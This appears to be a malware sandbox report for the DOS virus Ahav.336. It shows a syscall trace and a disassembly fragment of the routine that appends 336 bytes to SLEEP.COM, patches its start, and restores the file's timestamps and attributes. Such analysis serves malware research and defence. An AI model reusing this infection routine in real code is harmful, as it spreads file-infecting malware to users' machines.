Sample viewer

vx.netlux.org/Virus.DOS.Ahav.336


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:36.749987714Z 53 PC: 12b3a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:36.751733353Z 37 PC: 12b4b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:36.755014625Z 26 PC: 12a61 | Set disk transfer address
2018-12-17T23:11:36.756307013Z 78 PC: 12a6a | Find first file
2018-12-17T23:11:36.763324678Z 61 PC: 12a75 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:36.778926709Z 63 PC: 12a81 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:36.786872069Z 44 PC: 12acf | Get time

Disassembly following the Get time call at 0x12acf (as captured in the trace):

0x12acf: mov word ptr [bp + 0x24a], dx
0x12ad3: call 0x22ac2
0x12ad6: lea si, word ptr [bp + 0x265]
0x12ada: mov cx, 9
0x12add: lea di, word ptr [bp + 0x23d]
0x12ae1: rep movsb byte ptr es:[di], byte ptr [si]
0x12ae3: mov ax, 0x4202
0x12ae6: xor dx, dx
0x12ae8: xor cx, cx
0x12aea: int 0x21
0x12aec: sub ax, 3
0x12aef: mov word ptr [bp + 0x23a], ax
0x12af3: mov ah, 0x40
0x12af5: mov cx, 0x150
0x12af8: lea dx, word ptr [bp + 0x100]
0x12afc: int 0x21
0x12afe: mov ax, 0x4200
0x12b01: xor cx, cx
0x12b03: xor dx, dx
0x12b05: int 0x21

2018-12-17T23:11:36.792615026Z 66 PC: 12aec | Move file pointer
2018-12-17T23:11:36.797237132Z 64 PC: 12afe | Write file or device (Write 336 bytes on handle 5)
2018-12-17T23:11:36.822793037Z 66 PC: 12b07 | Move file pointer
2018-12-17T23:11:36.82499928Z 64 PC: 12b12 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:36.838844243Z 87 PC: 12b20 | Get or set file date and time
2018-12-17T23:11:36.840986825Z 62 PC: 12b24 | Close file
2018-12-17T23:11:36.851229362Z 67 PC: 12b34 | Get or set file attributes
2018-12-17T23:11:36.865040588Z 26 PC: 12ab2 | Set disk transfer address
2018-12-17T23:11:36.867808063Z 37 PC: 12b5f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')